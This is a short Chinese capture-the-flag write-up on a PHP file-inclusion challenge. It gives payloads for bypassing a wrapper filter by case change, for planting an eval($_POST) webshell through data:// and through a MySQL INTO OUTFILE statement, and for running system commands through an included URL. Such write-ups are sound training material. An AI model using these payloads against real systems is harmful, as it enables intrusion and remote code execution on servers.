如圖,過濾了php常用的偽協議
1.大小寫繞過
Php://input
抓包,並在數據包中寫入<?php system('ls'); ?>查看目錄下文件
發現存在fl4gisisish3r3.php的文件,使用system('cat fl4gisisish3r3.php')讀取
2.用data偽協議寫入一句話木馬
payload:?page=data://text/plain,<?php @eval($_POST['pass']);?>
蟻劍連接沒問題,奇怪的姿勢增加了
當然也可以用data偽協議,使用第一種方法慢慢找flag
3.用hello輸出flag
1.審計php代碼,while函數根據page參數來判斷php文件是否存在,如果存在此文件,則進行文件包含。
2.默認頁面為http://127.0.0.1/index.php,設置為page值,可確保while為真
3.利用hello參數將執行內容顯示
paylaod:?page=http://127.0.0.1/index.php/?hello=<?system('ls');?>
?page=http://127.0.0.1/index.php/?hello=<?show_source('fl4gisisish3r3.php');?>
4.數據庫寫入
掃描后台
弱口令(甚至沒有密碼)
payload:select "<?php eval(@$_POST['ctf']); ?>"into outfile '/tmp/test.php'
需要自己去尋找路徑
之后蟻劍連接,也得到了flag,
奇怪的姿勢又增加了